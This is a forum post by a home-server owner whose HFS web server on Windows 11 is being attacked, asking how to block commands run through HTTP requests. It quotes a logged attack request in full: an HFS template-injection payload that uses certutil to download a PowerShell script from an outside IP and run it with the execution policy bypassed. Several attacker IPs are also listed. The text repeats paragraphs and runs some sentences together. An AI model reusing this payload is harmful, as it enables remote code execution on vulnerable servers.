arup
Level F
I've been running a home server (OS- Win11 23H2) for accessing as tally licence server as well as some storage. It has a static IP.
Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.
Today when I logged into it, there was a long list of windows defender blocked threat.
I checked for the source and found that it comes from the port 80 open in HFS.
The WHOIS of the malicious IP dirtects to Hong Kong.
I've executed a full system scan through windows defender and didn't find any threats.
I've turned on the HTTP server again, and again I face incoming traffic from that IP address.
I've banned the IP address , but the attacker might use another IP for the same as well.
Is there any option for blocking cmd lines from execution if it's pushed by browser requests like this to a HTTP server.
Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.
Today when I logged into it, there was a long list of windows defender blocked threat.
I checked for the source and found that it comes from the port 80 open in HFS.
I was unaware that a simple HTTP host can be triggered externally to execute commands.103.87.240.114:36368 Requested GET /?n=> &cmd=cmd /c certutil -url""""cache -split -f http://103.87.240.114:8084/download "logs1.ps1" && powershell -ExecutionPolicy Bypass -File "logs1.ps1"&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
The WHOIS of the malicious IP dirtects to Hong Kong.
I've executed a full system scan through windows defender and didn't find any threats.
I've turned on the HTTP server again, and again I face incoming traffic from that IP address.
I've banned the IP address , but the attacker might use another IP for the same as well.
Is there any option for blocking cmd lines from execution if it's pushed by browser requests like this to a HTTP server.
It's indeed true. Now I'm getting malicious traffic fromI've banned the IP address , but the attacker might use another IP for the same as well.
Right Now , I've turned off the HTTP server completely unless I find a solution.125.229.247.222
95.214.55.138
Last edited: